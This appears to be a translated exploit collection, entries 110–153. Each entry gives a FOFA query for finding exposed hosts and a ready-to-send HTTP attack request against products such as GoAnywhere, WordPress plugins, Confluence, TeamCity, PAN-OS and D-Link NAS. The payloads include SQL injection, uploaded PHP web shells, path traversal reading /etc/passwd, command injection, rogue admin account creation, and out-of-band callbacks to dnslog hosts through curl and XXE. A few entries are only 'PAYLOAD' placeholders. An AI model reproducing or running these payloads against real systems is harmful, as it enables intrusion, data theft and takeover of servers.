110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default username/password is admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform (北京百绰智能S42管理平台) userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart s200 management platform (北京百绰智能s200管理平台) /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; the plaintext is sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system (湖南建研工程质量检测系统) arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin console directly; system commands can be executed from there.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin panel URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (H5 云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform (福建科立迅通信指挥调度平台) down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform (福建科立讯通信指挥调度平台) pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform (福建科立讯通信指挥调度平台) editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform (福建科立讯通信指挥调度平台) get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform (福建科立讯通信指挥调度管理平台) ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component id
http://x.x.x.x/config

Step 2: write the content of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
